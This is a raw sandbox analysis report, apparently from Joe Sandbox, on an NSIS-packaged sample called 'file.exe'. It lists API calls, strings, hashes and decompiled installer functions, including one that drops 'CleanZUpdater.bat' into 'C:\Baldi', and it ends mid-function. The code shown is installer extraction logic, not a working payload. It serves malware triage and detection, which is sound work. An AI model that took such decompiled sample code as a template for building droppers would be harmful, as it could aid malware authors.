0x00403676
0x00000000
0x00403658
0x00403659
0x00403662
0x00403668
0x00403669
0x00000000
0x00403669
0x00403664
0x00403666
0x00000000
0x00000000
0x00000000
0x00403666
0x00403646

APIs

Part of subcall function 00405D2E: GetModuleHandleA.KERNEL32(?,?,00000000,0040313D,00000008), ref: 00405D40
Part of subcall function 00405D2E: LoadLibraryA.KERNELBASE(?,?,00000000,0040313D,00000008), ref: 00405D4B
Part of subcall function 00405D2E: GetProcAddress.KERNEL32(00000000,?), ref: 00405D5C

lstrcatA.KERNEL32(1049,00429FE0,80000001,Control Panel\Desktop\ResourceLocale,00000000,00429FE0,00000000,00000006,"C:\Users\user\Desktop\file.exe",00000000,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004035C6
lstrlenA.KERNEL32(0042DB00,?,?,?,0042DB00,00000000,C:\Baldi,1049,00429FE0,80000001,Control Panel\Desktop\ResourceLocale,00000000,00429FE0,00000000,00000006,"C:\Users\user\Desktop\file.exe"), ref: 0040363B
lstrcmpiA.KERNEL32(?,.exe,0042DB00,?,?,?,0042DB00,00000000,C:\Baldi,1049,00429FE0,80000001,Control Panel\Desktop\ResourceLocale,00000000,00429FE0,00000000), ref: 0040364E
GetFileAttributesA.KERNEL32(0042DB00), ref: 00403659
LoadImageA.USER32 ref: 004036A2

Part of subcall function 0040596A: wsprintfA.USER32 ref: 00405977

RegisterClassA.USER32 ref: 004036E9
SystemParametersInfoA.USER32(00000030,00000000,_Nb,00000000), ref: 00403701
CreateWindowExA.USER32 ref: 0040373A
ShowWindow.USER32(00000005,00000000), ref: 00403770
LoadLibraryA.KERNEL32(RichEd20), ref: 00403781
LoadLibraryA.KERNEL32(RichEd32), ref: 0040378C
GetClassInfoA.USER32 ref: 0040379C
GetClassInfoA.USER32 ref: 004037A9
RegisterClassA.USER32 ref: 004037B2
DialogBoxParamA.USER32 ref: 004037D1

Strings

.DEFAULT\Control Panel\International, xrefs: 004035B1
.exe, xrefs: 00403648
C:\Baldi, xrefs: 004035D5, 004035DD, 00403675, 0040367B, 0040368B
"C:\Users\user\Desktop\file.exe", xrefs: 00403561
RichEd20, xrefs: 0040377C
1049, xrefs: 00403575, 004035C1
:\Baldi, xrefs: 0040362B, 00403632, 0040363A, 00403658
RichEdit20A, xrefs: 00403794, 0040379A
Control Panel\Desktop\ResourceLocale, xrefs: 00403589
C:\Users\user\AppData\Local\Temp\, xrefs: 00403559
_Nb, xrefs: 004036F8, 004036FD
RichEdit, xrefs: 004037A3
RichEd32, xrefs: 00403787

Memory Dump Source

Source File: 00000000.00000002.376208479.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.376119832.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376324958.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376354686.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376354686.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376354686.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376354686.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376799904.0000000000439000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: ClassLoad$InfoLibrary$RegisterWindow$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
String ID: "C:\Users\user\Desktop\file.exe"$.DEFAULT\Control Panel\International$.exe$1049$:\Baldi$C:\Baldi$C:\Users\user\AppData\Local\Temp\$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
API String ID: 914957316-55283012
Opcode ID: 3a2c45f0d62c5ae26582f53126e34280adb3cccee4e3bf9508370ae987846fa1
Instruction ID: af9374935d7a54fd1dce6881c110e57d7cc589bc1fe1380e1b33b637fa7f222c
Opcode Fuzzy Hash: 3a2c45f0d62c5ae26582f53126e34280adb3cccee4e3bf9508370ae987846fa1
Instruction Fuzzy Hash: E161C571604204BAD220AF669D85F273EACE744759F40447FF941B22E1D779AD028B3E

Uniqueness

Uniqueness Score: -1.00%

Function 00402C22 Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 182
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 78%

			E00402C22(void* __eflags, signed int _a4) {
				DWORD* _v8;
				DWORD* _v12;
				void* _v16;
				intOrPtr _v20;
				long _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int _v44;
				long _t43;
				long _t50;
				void* _t53;
				void* _t57;
				intOrPtr* _t59;
				long _t60;
				long _t70;
				void* _t71;
				signed int _t77;
				intOrPtr _t80;
				long _t82;
				void* _t85;
				signed int _t87;
				void* _t89;
				long _t90;
				long _t93;
				void* _t94;

				_t82 = 0;
				_v12 = 0;
				_v8 = 0;
				_t43 = GetTickCount();
				_t91 = "C:\\Users\\hardz\\Desktop\\file.exe";
				 *0x42eb6c = _t43 + 0x3e8;
				GetModuleFileNameA(0, "C:\\Users\\hardz\\Desktop\\file.exe", 0x400);
				_t89 = E004056E3(_t91, 0x80000000, 3);
				_v16 = _t89;
				 *0x409014 = _t89;
				if(_t89 == 0xffffffff) {
					return "Error launching installer";
				}
				_t92 = "C:\\Users\\hardz\\Desktop";
				E00405A0C("C:\\Users\\hardz\\Desktop", _t91);
				E00405A0C(0x436000, E00405546(_t92));
				_t50 = GetFileSize(_t89, 0);
				 *0x428b90 = _t50;
				_t93 = _t50;
				if(_t50 <= 0) {
					L24:
					E00402BBE(1);
					if( *0x42eb74 == _t82) {
						goto L29;
					}
					if(_v8 == _t82) {
						L28:
						_t53 = GlobalAlloc(0x40, _v24); // executed
						_t94 = _t53;
						E004030AF( *0x42eb74 + 0x1c);
						_push(_v24);
						_push(_t94);
						_push(_t82);
						_push(0xffffffff); // executed
						_t57 = E00402E5B(); // executed
						if(_t57 == _v24) {
							 *0x42eb70 = _t94;
							 *0x42eb78 =  *_t94;
							if((_v44 & 0x00000001) != 0) {
								 *0x42eb7c =  *0x42eb7c + 1;
							}
							_t40 = _t94 + 0x44; // 0x44
							_t59 = _t40;
							_t85 = 8;
							do {
								_t59 = _t59 - 8;
								 *_t59 =  *_t59 + _t94;
								_t85 = _t85 - 1;
							} while (_t85 != 0);
							_t60 = SetFilePointer(_v16, _t82, _t82, 1); // executed
							 *(_t94 + 0x3c) = _t60;
							E004056A4(0x42eb80, _t94 + 4, 0x40);
							return 0;
						}
						goto L29;
					}
					E004030AF( *0x414b80);
					if(E0040307D( &_a4, 4) == 0 || _v12 != _a4) {
						goto L29;
					} else {
						goto L28;
					}
				} else {
					do {
						_t90 = _t93;
						asm("sbb eax, eax");
						_t70 = ( ~( *0x42eb74) & 0x00007e00) + 0x200;
						if(_t93 >= _t70) {
							_t90 = _t70;
						}
						_t71 = E0040307D(0x420b90, _t90); // executed
						if(_t71 == 0) {
							E00402BBE(1);
							L29:
							return "Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
						}
						if( *0x42eb74 != 0) {
							if((_a4 & 0x00000002) == 0) {
								E00402BBE(0);
							}
							goto L20;
						}
						E004056A4( &_v44, 0x420b90, 0x1c);
						_t77 = _v44;
						if((_t77 & 0xfffffff0) == 0 && _v40 == 0xdeadbeef && _v28 == 0x74736e49 && _v32 == 0x74666f73 && _v36 == 0x6c6c754e) {
							_a4 = _a4 | _t77;
							_t87 =  *0x414b80; // 0x25600
							 *0x42ec00 =  *0x42ec00 | _a4 & 0x00000002;
							_t80 = _v20;
							 *0x42eb74 = _t87;
							if(_t80 > _t93) {
								goto L29;
							}
							if((_a4 & 0x00000008) != 0 || (_a4 & 0x00000004) == 0) {
								_v8 = _v8 + 1;
								_t24 = _t80 - 4; // 0x40915c
								_t93 = _t24;
								if(_t90 > _t93) {
									_t90 = _t93;
								}
								goto L20;
							} else {
								break;
							}
						}
						L20:
						if(_t93 <  *0x428b90) {
							_v12 = E00405D9A(_v12, 0x420b90, _t90);
						}
						 *0x414b80 =  *0x414b80 + _t90;
						_t93 = _t93 - _t90;
					} while (_t93 > 0);
					_t82 = 0;
					goto L24;
				}
			}

0x00402c2a
0x00402c2d
0x00402c30
0x00402c33
0x00402c39
0x00402c4a
0x00402c4f
0x00402c62
0x00402c67
0x00402c6a
0x00402c70
0x00000000
0x00402c72
0x00402c7d
0x00402c83
0x00402c94
0x00402c9b
0x00402ca3
0x00402ca8
0x00402caa
0x00402d97
0x00402d99
0x00402da5
0x00000000
0x00000000
0x00402daa
0x00402dce
0x00402dd3
0x00402dd9
0x00402de4
0x00402de9
0x00402dec
0x00402ded
0x00402dee
0x00402df0
0x00402df8
0x00402e0f
0x00402e17
0x00402e1c
0x00402e1e
0x00402e1e
0x00402e26
0x00402e26
0x00402e29
0x00402e2a
0x00402e2a
0x00402e2d
0x00402e2f
0x00402e2f
0x00402e39
0x00402e3f
0x00402e4d
0x00000000
0x00402e52
0x00000000
0x00402df8
0x00402db2
0x00402dc4
0x00000000
0x00000000
0x00000000
0x00000000
0x00402cb0
0x00402cb5
0x00402cba
0x00402cbe
0x00402cc5
0x00402ccc
0x00402cce
0x00402cce
0x00402cd2
0x00402cd9
0x00402e03
0x00402dfa
0x00000000
0x00402dfa
0x00402ce6
0x00402d66
0x00402d6a
0x00402d6f
0x00000000
0x00402d66
0x00402cef
0x00402cf4
0x00402cfc
0x00402d22
0x00402d28
0x00402d31
0x00402d37
0x00402d3c
0x00402d42
0x00000000
0x00000000
0x00402d4c
0x00402d54
0x00402d57
0x00402d57
0x00402d5c
0x00402d5e
0x00402d5e
0x00000000
0x00000000
0x00000000
0x00000000
0x00402d4c
0x00402d70
0x00402d76
0x00402d82
0x00402d82
0x00402d85
0x00402d8b
0x00402d8d
0x00402d95
0x00000000
0x00402d95

APIs

GetTickCount.KERNEL32 ref: 00402C33
GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\file.exe,00000400), ref: 00402C4F

Part of subcall function 004056E3: GetFileAttributesA.KERNELBASE(00000003,00402C62,C:\Users\user\Desktop\file.exe,80000000,00000003), ref: 004056E7
Part of subcall function 004056E3: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405709

GetFileSize.KERNEL32(00000000,00000000,00436000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\file.exe,C:\Users\user\Desktop\file.exe,80000000,00000003), ref: 00402C9B

Strings

Null, xrefs: 00402D19
Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00402DFA
"C:\Users\user\Desktop\file.exe", xrefs: 00402C2C
C:\Users\user\Desktop, xrefs: 00402C7D, 00402C82, 00402C88
soft, xrefs: 00402D10
Inst, xrefs: 00402D07
Error launching installer, xrefs: 00402C72
C:\Users\user\AppData\Local\Temp\, xrefs: 00402C22
C:\Users\user\Desktop\file.exe, xrefs: 00402C39, 00402C48, 00402C5C, 00402C7C

Memory Dump Source

Source File: 00000000.00000002.376208479.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.376119832.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376324958.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376354686.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376354686.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376354686.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376354686.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376799904.0000000000439000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: File$AttributesCountCreateModuleNameSizeTick
String ID: "C:\Users\user\Desktop\file.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\file.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
API String ID: 4283519449-2433310678
Opcode ID: 1aa0d1efbed9786f842be751fafdabbb11e6860e74167932e572fcfd279c9ed7
Instruction ID: 5cdc40c0d59b83eec34e45f83230a383a342561faf5f4e8ee161a7b3089b1b43
Opcode Fuzzy Hash: 1aa0d1efbed9786f842be751fafdabbb11e6860e74167932e572fcfd279c9ed7
Instruction Fuzzy Hash: 40512371A00214ABDB20DF61DE89B9E7BA8EF04329F10413BF905B62D1D7BC9D418B9D

Uniqueness

Uniqueness Score: -1.00%

Function 00402E5B Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 174
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 95%

			E00402E5B(int _a4, void* _a8, long _a12, int _a16, signed char _a19) {
				signed int _v8;
				long _v12;
				void* _v16;
				long _v20;
				long _v24;
				intOrPtr _v28;
				char _v92;
				void* _t67;
				void* _t68;
				long _t74;
				intOrPtr _t79;
				long _t80;
				int _t84;
				void* _t97;
				void* _t100;
				long _t101;
				signed int _t102;
				long _t103;
				int _t104;
				long _t106;
				void* _t107;

				_t102 = _a16;
				_t97 = _a12;
				_v12 = _t102;
				if(_t97 == 0) {
					_v12 = 0x8000;
				}
				_v8 = _v8 & 0x00000000;
				_v16 = _t97;
				if(_t97 == 0) {
					_v16 = 0x418b88;
				}
				_t65 = _a4;
				if(_a4 >= 0) {
					E004030AF( *0x42ebb8 + _t65);
				}
				_t67 = E0040307D( &_a16, 4); // executed
				if(_t67 == 0) {
					L34:
					_push(0xfffffffd);
					goto L35;
				} else {
					if((_a19 & 0x00000080) == 0) {
						if(_t97 == 0) {
							while(_a16 > 0) {
								_t103 = _v12;
								if(_a16 < _t103) {
									_t103 = _a16;
								}
								if(E0040307D(0x414b88, _t103) == 0) {
									goto L34;
								} else {
									if(WriteFile(_a8, 0x414b88, _t103,  &_a12, 0) == 0 || _t103 != _a12) {
										L29:
										_push(0xfffffffe);
										L35:
										_pop(_t68);
										return _t68;
									} else {
										_v8 = _v8 + _t103;
										_a16 = _a16 - _t103;
										continue;
									}
								}
							}
							L45:
							return _v8;
						}
						if(_a16 < _t102) {
							_t102 = _a16;
						}
						if(E0040307D(_t97, _t102) != 0) {
							_v8 = _t102;
							goto L45;
						} else {
							goto L34;
						}
					}
					_t74 = GetTickCount();
					 *0x40b4ec =  *0x40b4ec & 0x00000000;
					 *0x40b4e8 =  *0x40b4e8 & 0x00000000;
					_t14 =  &_a16;
					 *_t14 = _a16 & 0x7fffffff;
					_v20 = _t74;
					 *0x40afd0 = 8;
					 *0x414b78 = 0x40cb70;
					 *0x414b74 = 0x40cb70;
					 *0x414b70 = 0x414b70;
					_a4 = _a16;
					if( *_t14 <= 0) {
						goto L45;
					} else {
						goto L9;
					}
					while(1) {
						L9:
						_t104 = 0x4000;
						if(_a16 < 0x4000) {
							_t104 = _a16;
						}
						if(E0040307D(0x414b88, _t104) == 0) {
							goto L34;
						}
						_a16 = _a16 - _t104;
						 *0x40afc0 = 0x414b88;
						 *0x40afc4 = _t104;
						while(1) {
							_t100 = _v16;
							 *0x40afc8 = _t100;
							 *0x40afcc = _v12;
							_t79 = E00405E08(0x40afc0);
							_v28 = _t79;
							if(_t79 < 0) {
								break;
							}
							_t106 =  *0x40afc8 - _t100;
							_t80 = GetTickCount();
							_t101 = _t80;
							if(( *0x42ec14 & 0x00000001) != 0 && (_t80 - _v20 > 0xc8 || _a16 == 0)) {
								wsprintfA( &_v92, "... %d%%", MulDiv(_a4 - _a16, 0x64, _a4));
								_t107 = _t107 + 0xc;
								E00404DAA(0,  &_v92);
								_v20 = _t101;
							}
							if(_t106 == 0) {
								if(_a16 > 0) {
									goto L9;
								}
								goto L45;
							} else {
								if(_a12 != 0) {
									_v8 = _v8 + _t106;
									_v12 = _v12 - _t106;
									_v16 =  *0x40afc8;
									L24:
									if(_v28 != 1) {
										continue;
									}
									goto L45;
								}
								_t84 = WriteFile(_a8, _v16, _t106,  &_v24, 0); // executed
								if(_t84 == 0 || _v24 != _t106) {
									goto L29;
								} else {
									_v8 = _v8 + _t106;
									goto L24;
								}
							}
						}
						_push(0xfffffffc);
						goto L35;
					}
					goto L34;
				}
			}

0x00402e63
0x00402e67
0x00402e6a
0x00402e6f
0x00402e71
0x00402e71
0x00402e78
0x00402e7c
0x00402e81
0x00402e83
0x00402e83
0x00402e8a
0x00402e8f
0x00402e9a
0x00402e9a
0x00402ea5
0x00402eac
0x00403028
0x00403028
0x00000000
0x00402eb2
0x00402eb6
0x00403013
0x00403068
0x0040302d
0x00403033
0x00403035
0x00403035
0x00403046
0x00000000
0x00403048
0x0040305b
0x0040300d
0x0040300d
0x0040302a
0x0040302a
0x00000000
0x00403062
0x00403062
0x00403065
0x00000000
0x00403065
0x0040305b
0x00403046
0x00403073
0x00000000
0x00403073
0x00403018
0x0040301a
0x0040301a
0x00403026
0x00403070
0x00000000
0x00000000
0x00000000
0x00000000
0x00403026
0x00402ec2
0x00402ec4
0x00402ecb
0x00402ed2
0x00402ed2
0x00402ed9
0x00402ee1
0x00402eeb
0x00402ef0
0x00402ef8
0x00402f02
0x00402f05
0x00000000
0x00000000
0x00000000
0x00000000
0x00402f0b
0x00402f0b
0x00402f0b
0x00402f13
0x00402f15
0x00402f15
0x00402f26
0x00000000
0x00000000
0x00402f2c
0x00402f2f
0x00402f35
0x00402f3b
0x00402f3b
0x00402f46
0x00402f4c
0x00402f51
0x00402f58
0x00402f5b
0x00000000
0x00000000
0x00402f67
0x00402f69
0x00402f72
0x00402f74
0x00402fa2
0x00402fa8
0x00402fb1
0x00402fb6
0x00402fb6
0x00402fbd
0x00403001
0x00000000
0x00000000
0x00000000
0x00402fbf
0x00402fc2
0x00402fe9
0x00402fec
0x00402fef
0x00402ff2
0x00402ff6
0x00000000
0x00000000
0x00000000
0x00402ffc
0x00402fd0
0x00402fd8
0x00000000
0x00402fdf
0x00402fdf
0x00000000
0x00402fdf
0x00402fd8
0x00402fbd
0x00403009
0x00000000
0x00403009
0x00000000
0x00402f0b

APIs

GetTickCount.KERNEL32 ref: 00402EC2
GetTickCount.KERNEL32 ref: 00402F69
MulDiv.KERNEL32(7FFFFFFF,00000064,00000020), ref: 00402F92
wsprintfA.USER32 ref: 00402FA2
WriteFile.KERNELBASE(00000000,00000000,?,7FFFFFFF,00000000), ref: 00402FD0

Strings

... %d%%, xrefs: 00402F9C

Memory Dump Source

Source File: 00000000.00000002.376208479.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.376119832.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376324958.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376354686.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376354686.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376354686.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376354686.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376799904.0000000000439000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: CountTick$FileWritewsprintf
String ID: ... %d%%
API String ID: 4209647438-2449383134
Opcode ID: 41e35a0a14bb3f2fd38d9c716afd6c3ba0ace6c0ea9dec4adf0e27dc0e0f292a
Instruction ID: 0d39cdfb2b20f01ea0ef459ff81ac6f09524c508dd7874cbed1e127a204ff5ac
Opcode Fuzzy Hash: 41e35a0a14bb3f2fd38d9c716afd6c3ba0ace6c0ea9dec4adf0e27dc0e0f292a
Instruction Fuzzy Hash: 3D618D7190121AEBDF10CF65DA44A9E7BB8EF04366F10413BF800B72D4D7789A51DBAA

Uniqueness

Uniqueness Score: -1.00%

Function 00401734 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 147
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 73%

			E00401734(FILETIME* __ebx, void* __eflags) {
				void* _t33;
				void* _t41;
				void* _t43;
				FILETIME* _t49;
				FILETIME* _t62;
				void* _t64;
				signed int _t70;
				FILETIME* _t71;
				FILETIME* _t75;
				signed int _t77;
				void* _t80;
				CHAR* _t82;
				void* _t85;

				_t75 = __ebx;
				_t82 = E004029F6(0x31);
				 *(_t85 - 8) = _t82;
				 *(_t85 + 8) =  *(_t85 - 0x24) & 0x00000007;
				_t33 = E0040556C(_t82);
				_push(_t82);
				if(_t33 == 0) {
					lstrcatA(E004054FF(E00405A0C(0x409b80, "C:\\Baldi")), ??);
				} else {
					_push(0x409b80);
					E00405A0C();
				}
				E00405C6E(0x409b80);
				while(1) {
					__eflags =  *(_t85 + 8) - 3;
					if( *(_t85 + 8) >= 3) {
						_t64 = E00405D07(0x409b80);
						_t77 = 0;
						__eflags = _t64 - _t75;
						if(_t64 != _t75) {
							_t71 = _t64 + 0x14;
							__eflags = _t71;
							_t77 = CompareFileTime(_t71, _t85 - 0x18);
						}
						asm("sbb eax, eax");
						_t70 =  ~(( *(_t85 + 8) + 0xfffffffd | 0x80000000) & _t77) + 1;
						__eflags = _t70;
						 *(_t85 + 8) = _t70;
					}
					__eflags =  *(_t85 + 8) - _t75;
					if( *(_t85 + 8) == _t75) {
						E004056C4(0x409b80);
					}
					__eflags =  *(_t85 + 8) - 1;
					_t41 = E004056E3(0x409b80, 0x40000000, (0 |  *(_t85 + 8) != 0x00000001) + 1);
					__eflags = _t41 - 0xffffffff;
					 *(_t85 - 0x34) = _t41;
					if(_t41 != 0xffffffff) {
						break;
					}
					__eflags =  *(_t85 + 8) - _t75;
					if( *(_t85 + 8) != _t75) {
						E00404DAA(0xffffffe2,  *(_t85 - 8));
						__eflags =  *(_t85 + 8) - 2;
						if(__eflags == 0) {
							 *((intOrPtr*)(_t85 - 4)) = 1;
						}
						L31:
						 *0x42ebe8 =  *0x42ebe8 +  *((intOrPtr*)(_t85 - 4));
						__eflags =  *0x42ebe8;
						goto L32;
					} else {
						E00405A0C(0x40a380, 0x42f000);
						E00405A0C(0x42f000, 0x409b80);
						E00405A2E(_t75, 0x40a380, 0x409b80, 0x409f80,  *((intOrPtr*)(_t85 - 0x10)));
						E00405A0C(0x42f000, 0x40a380);
						_t62 = E004052CD(0x409f80,  *(_t85 - 0x24) >> 3) - 4;
						__eflags = _t62;
						if(_t62 == 0) {
							continue;
						} else {
							__eflags = _t62 == 1;
							if(_t62 == 1) {
								 *0x42ebe8 =  &( *0x42ebe8->dwLowDateTime);
								L32:
								_t49 = 0;
								__eflags = 0;
							} else {
								_push(0x409b80);
								_push(0xfffffffa);
								E00404DAA();
								L29:
								_t49 = 0x7fffffff;
							}
						}
					}
					L33:
					return _t49;
				}
				E00404DAA(0xffffffea,  *(_t85 - 8));
				 *0x42ec14 =  *0x42ec14 + 1;
				_t43 = E00402E5B( *((intOrPtr*)(_t85 - 0x1c)),  *(_t85 - 0x34), _t75, _t75); // executed
				 *0x42ec14 =  *0x42ec14 - 1;
				__eflags =  *(_t85 - 0x18) - 0xffffffff;
				_t80 = _t43;
				if( *(_t85 - 0x18) != 0xffffffff) {
					L22:
					SetFileTime( *(_t85 - 0x34), _t85 - 0x18, _t75, _t85 - 0x18); // executed
				} else {
					__eflags =  *((intOrPtr*)(_t85 - 0x14)) - 0xffffffff;
					if( *((intOrPtr*)(_t85 - 0x14)) != 0xffffffff) {
						goto L22;
					}
				}
				FindCloseChangeNotification( *(_t85 - 0x34)); // executed
				__eflags = _t80 - _t75;
				if(_t80 >= _t75) {
					goto L31;
				} else {
					__eflags = _t80 - 0xfffffffe;
					if(_t80 != 0xfffffffe) {
						E00405A2E(_t75, _t80, 0x409b80, 0x409b80, 0xffffffee);
					} else {
						E00405A2E(_t75, _t80, 0x409b80, 0x409b80, 0xffffffe9);
						lstrcatA(0x409b80,  *(_t85 - 8));
					}
					_push(0x200010);
					_push(0x409b80);
					E004052CD();
					goto L29;
				}
				goto L33;
			}

0x00401734
0x0040173b
0x00401744
0x00401747
0x0040174a
0x0040174f
0x00401757
0x00401773
0x00401759
0x00401759
0x0040175a
0x0040175a
0x00401779
0x00401783
0x00401783
0x00401787
0x0040178a
0x0040178f
0x00401791
0x00401793
0x00401798
0x00401798
0x004017a3
0x004017a3
0x004017b4
0x004017b6
0x004017b6
0x004017b7
0x004017b7
0x004017ba
0x004017bd
0x004017c0
0x004017c0
0x004017c7
0x004017d6
0x004017db
0x004017de
0x004017e1
0x00000000
0x00000000
0x004017e3
0x004017e6
0x00401840
0x00401845
0x004015a8
0x0040265c
0x0040265c
0x0040288b
0x0040288e
0x0040288e
0x00000000
0x004017e8
0x004017ee
0x004017f9
0x00401806
0x00401811
0x00401827
0x00401827
0x0040182a
0x00000000
0x00401830
0x00401830
0x00401831
0x0040184e
0x00402894
0x00402894
0x00402894
0x00401833
0x00401833
0x00401834
0x00401492
0x0040220e
0x0040220e
0x0040220e
0x00401831
0x0040182a
0x00402896
0x0040289a
0x0040289a
0x0040185e
0x00401863
0x00401871
0x00401876
0x0040187c
0x00401880
0x00401882
0x0040188a
0x00401896
0x00401884
0x00401884
0x00401888
0x00000000
0x00000000
0x00401888
0x0040189f
0x004018a5
0x004018a7
0x00000000
0x004018ad
0x004018ad
0x004018b0
0x004018c8
0x004018b2
0x004018b5
0x004018be
0x004018be
0x004018cd
0x004018d2
0x00402209
0x00000000
0x00402209
0x00000000

APIs

lstrcatA.KERNEL32(00000000,00000000,CleanZUpdater.bat,C:\Baldi,00000000,00000000,00000031), ref: 00401773
CompareFileTime.KERNEL32(-00000014,?,CleanZUpdater.bat,CleanZUpdater.bat,00000000,00000000,CleanZUpdater.bat,C:\Baldi,00000000,00000000,00000031), ref: 0040179D

Part of subcall function 00405A0C: lstrcpynA.KERNEL32(?,?,00000400,00403168,0042E360,NSIS Error), ref: 00405A19

Part of subcall function 00404DAA: lstrlenA.KERNEL32(004297B8,00000000,?,74D0EA30,?,?,?,?,?,?,?,?,?,00402FB6,00000000,?), ref: 00404DE3
Part of subcall function 00404DAA: lstrlenA.KERNEL32(00402FB6,004297B8,00000000,?,74D0EA30,?,?,?,?,?,?,?,?,?,00402FB6,00000000), ref: 00404DF3
Part of subcall function 00404DAA: lstrcatA.KERNEL32(004297B8,00402FB6,00402FB6,004297B8,00000000,?,74D0EA30), ref: 00404E06
Part of subcall function 00404DAA: SetWindowTextA.USER32(004297B8,004297B8), ref: 00404E18
Part of subcall function 00404DAA: SendMessageA.USER32 ref: 00404E3E
Part of subcall function 00404DAA: SendMessageA.USER32 ref: 00404E58
Part of subcall function 00404DAA: SendMessageA.USER32 ref: 00404E66

Strings

C:\Baldi, xrefs: 00401761
CleanZUpdater.bat, xrefs: 00401750, 00401759, 00401766, 00401778, 00401789, 004017BF, 004017D5, 004017F3, 00401833, 004018B4, 004018BD, 004018C7, 004018D2

Memory Dump Source

Source File: 00000000.00000002.376208479.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.376119832.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376324958.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376354686.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376354686.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376354686.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376354686.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376799904.0000000000439000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
String ID: C:\Baldi$CleanZUpdater.bat
API String ID: 1941528284-2535006900
Opcode ID: f324c85fc2f324614552c21af61c380c89f90457e6ef3776ce2ffda22f3967b2
Instruction ID: 2412d90e5cc6ef50ac46e2462e63b4f26081636668b1d4f665875a47291bc265
Opcode Fuzzy Hash: f324c85fc2f324614552c21af61c380c89f90457e6ef3776ce2ffda22f3967b2
Instruction Fuzzy Hash: 4341D831A10515BACF10BBB5DD86DAF3A69EF41328B24433BF511F11E2D67C4A418E6D

Uniqueness

Uniqueness Score: -1.00%

Function 004015B3 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 55
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 85%

			E004015B3(struct _SECURITY_ATTRIBUTES* __ebx) {
				struct _SECURITY_ATTRIBUTES** _t10;
				int _t19;
				struct _SECURITY_ATTRIBUTES* _t20;
				signed char _t22;
				struct _SECURITY_ATTRIBUTES* _t23;
				CHAR* _t25;
